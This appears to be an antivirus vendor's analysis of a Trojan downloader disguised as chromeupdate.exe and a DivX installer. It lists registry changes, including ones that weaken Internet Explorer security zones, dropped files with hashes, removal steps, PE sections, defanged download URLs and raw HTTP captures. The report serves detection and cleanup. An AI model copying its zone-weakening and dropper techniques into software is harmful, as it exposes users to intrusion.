"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"UninstallString" = "%Program Files%\Your Product\uninstall.exe /U:%Program Files%\Your Product\Uninstall\uninstall.xml"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"InstallLocation" = "%Program Files%\Your Product"
"URLInfoAbout" = "http://www.yourcompany.com"
"DisplayVersion" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Contact" = "Your Company Support Department"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayName" = "Your Product"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 00 60 AE EB 24 2A E3 19 B4 23 65 1A D4 A7 6E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Publisher" = "Your Company"
The process chromeupdate.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E7 12 98 0A 73 1B DF 13 86 55 77 36 1A D5 9D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
43e8f913fde18c9d26a5ef9fea97cfe7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\MediaPlayer__15159_il35679.exe |
e47d6ec4ca18c28652cc9512416f49d2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe |
ef609c21581a902f2f156f92477d91e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\chromeupdate.exe |
42971c53e22b8a4d1e67bcab1cb65af8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\msconfig.exe |
c3f5f4a1fb69b5889f0bbb313cf6017f | c:\Program Files\Your Product\lua5.1.dll |
9bdcf813d65265255b820bc7a704da3c | c:\Program Files\Your Product\uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.3.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.3.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: English (United States)
Company Name: Product Name: Setup Factory RuntimeProduct Version: 9.3.0.0 Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose CorporationLegal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.Original Filename: suf_launch.exeInternal Name: suf_launchFile Version: 9.3.0.0 File Description: Setup ApplicationComments: Created with Setup FactoryLanguage: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 22296 | 22528 | 4.47735 | c76b9ce587690b8a39ba7840b7dd540c |
.rdata | 28672 | 11906 | 12288 | 3.44864 | e96aa4f970e6f6799910a72904df3100 |
.data | 40960 | 6504 | 3072 | 1.79291 | e504fdbba062ee9bbd9ac425a4f5c0f5 |
.rsrc | 49152 | 114432 | 114688 | 5.20694 | d1acdca72b7083ccd64674f12ec99111 |
.reloc | 163840 | 4242 | 4608 | 2.5731 | a88bdb6f651ecf67b1b3db4a2866ea4e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://bumpacpacba.com/down/kabo/apps.php | 23.254.165.46 |
hxxp://ul.to/file/cmu9yf4p | 81.171.123.200 |
hxxp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 | 81.171.103.15 |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | |
hxxp://d3a3s75zr23wnc.cloudfront.net/V31/amipb.js | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png | |
hxxp://www.download-way.com/index.php | 54.83.25.106 |
hxxp://uploaded.net/file/cmu9yf4p | 81.171.123.200 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif | 216.137.59.70 |
hxxp://www.download-way.com/finalize.php | 54.83.25.106 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif | 216.137.59.70 |
hxxp://cdn1.downloadsoup.com/V31/amipb.js | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | 216.137.59.70 |
hxxp://ul.to/cmu9yf4p | 81.171.123.200 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif | 216.137.59.70 |
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif | 216.137.59.70 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="main.css"
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ihGFCsM8E_plzZ0J6HTBF9Hk8QKHpVjql3hy0vm1OaCsZhanKUhZog==
body {.. font-size:10px;. background:#eaeaea;. font-family: Arial;. margin: 0;. padding: 0;. color:#000000; .}..div, span, textarea {. cursor: default;.}..a, a span, a div {. cursor: pointer;.}../* whole screen styles */..ami-wrapper{. background : none no-repeat scroll 0 0 #eaeaea;. border:2px solid #989898; .}../* moddle element */..#ami-body.{..position: relative;. padding-left:27;. padding-right:27;.}...bottom-line{. background-color:#5cafd4;. height:45px;. width:100%;.}..table {. border-collapse: collapse;. margin: 0 ;. padding: 0;. font-size:10px;.}..textarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 5px;.}...textarea1{. background:#ffffff;. color:#000000;. height:100%;. width:100%;. overflow-x:hidden;.}..td{. padding: 0px;.}../* footer and footer buttons */...bottom-holder{. background-image:url('footer_img.png');. background-repeat:repeat-x;. height:59px;. position:absolute;. bottom:0px;. padding-left:20px;. padding-right:20px;.}...#btnNext{. background: url('next.gif') no-repeat;.}.#btnCancel{. background: url('cancel.gif') no-repeat;.}../* Use for cancle with no popup !!! */.#btnBack{. background: url('cancel1.gif') no-repeat;.}..#btnDecline{. background: url('decline.gif') no-repeat;.}..#btnAccept{. background: url('accept.gif') no-repeat;.}..#btnSkip{. background: url('skip.gif') no-repeat;.}...btn-finish-install{. background: url('finish.gif') no-r
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Fri, 18 Sep 2015 23:00:51 GMT
Content-Disposition: attachment; filename="footer_img.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22753
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fsZaDnw4YxQ1C1bo9ycU8q_uVjQ92b_dnFTMY4AfaH8i95_1ikRqTg==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397DFE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.]l....IEND.B`.....
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2897
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kneYqdjb33irVWIslI4GjhfH-yNyxQmdMbmQDpmUZ16MMWmiJQ7_0w==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....u.,....e........ot.............o..nC.............GCn.t.D.............BC.EF.............EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*....!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY.....K....c...Vg,.......f. 0.k... \..b.. L..@.J...)U.U.b......W.0......t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. ............................... }.J0...&x...f...-......AH.]pa..(..".A....=.(....p....X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P..P.@..t..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t............!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt......m...k..........n.f.AH...k...............p..../.......7.....!...Wl.K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t....L7...s....;....
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="skip.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -apQrhg9QXRCyPP2fyUgdtnxuF7SDjvFauvCwh7jqXMXzUZAdQOFvQ==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....e........|"E......*\......?...)....3j...... Cb.....R...\.....0c..I.&K8q........@...J....>...C...:P.J.J.*U.X.:......`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f..$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x.......F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.4.I...R.....m$.A............".T..%.pPC./.@....P.".......!.%......v.1...4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="next.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YEk9S8jOVorpCH9cVz6nyJEb5E_2Lk6eZPEudQm6PZYsuwBWQBxi_g==
GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:59 GMT
Content-Disposition: attachment; filename="finish.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2895
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kgsrX92jwc2x2VRBAYO3YeumSb004M1L2IJQauwWIBVZfBh1sNvEYQ==
